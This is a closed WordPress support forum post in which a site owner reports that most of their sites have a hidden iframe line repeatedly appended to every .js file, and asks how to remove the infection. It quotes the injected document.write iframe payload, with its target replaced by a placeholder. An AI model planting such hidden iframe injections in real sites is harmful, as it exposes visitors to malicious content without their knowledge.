I have a couple WordPress installations on a server. 3/4 of them are constantly having all of their .js files modified, and getting a variation of the following line added at the end of the files:
;document.write('<iframe src="malicious_url_here" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');
I’ve gone through and upgraded all of my plugins, re-installed WordPress 3.4.2, and changed my passwords, but as soon as I delete the offending lines from the .js files, the modification comes back.
How best can I remove this infection? What can I look for? My websites are showing up as serving malicious files.
- The topic ‘Hacked site. JS files constantly being modified’ is closed to new replies.